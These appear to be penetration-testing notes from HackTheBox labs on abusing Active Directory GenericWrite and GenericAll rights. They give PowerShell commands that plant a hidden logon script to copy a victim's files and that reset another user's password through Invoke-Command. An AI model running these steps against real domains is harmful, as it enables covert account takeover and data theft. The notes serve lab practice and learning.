GenericWrite/GenericAll/AllExtendedRights over Users

GenericAll allows an attacker to modify the object in question. In this example, we change the password of a Domain Administrator. GenericWrite allows the modification of certain things (More on this in Object from Hackthebox). Environment: Search from HacktheBox

You may need to authenticate to the Domain Controller as SMITH@OBJECT.LOCAL if you are not running a process as that user. To do this in conjunction with Set-DomainObject, first create a PSCredential object (these examples comes from the PowerView help documentation):

We can basically make the user execute things without the user knowing.

Invoking Powershell scripts.

We can use this to view restricted files for the user we have GenericWrite on.

We start by creating a powershell script that we can use to view restrcited directories or other shit we would want the script to do.

echo "ls C:\Users\Maria\Desktop\ > \ProgramData\out" > test.ps1

echo 'copy C:\Users\Maria\Desktop\Engines.xls C:\ProgramData\Engines.xls' > test.ps1

Set-DomainObject -Identity maria -SET @{scriptpath='C:\ProgramData\test.ps1'}

This is the script we created, we could also do a reverse tcp shell to execute but in the case that there is a firewall blocking outbound traffic, the best we can do is try to get creds from somewhere else

Invoke Command - Change the password of the user

We could set our credentials if we are runnning it as another user or else we can specify them how we usually do normally. GenericAll

Specifying Our Credentials

$SecPassword = ConvertTo-SecureString '<our-users-password>' -AsPlainText -Force

Then

$Cred = New-Object System.Management.Automation.PSCredential('<domain.name>\<our current user>', $SecPassword)

Then with these we can execute the following command.

Invoke-Command -c 127.0.0.1 -ScriptBlock {Set-ADAccountPassword -Identity <user-we-have-write-over -reset -NewPassword (ConvertTo-SecureString -AsPlainText 'Password1234!' -force)} -Credential $cred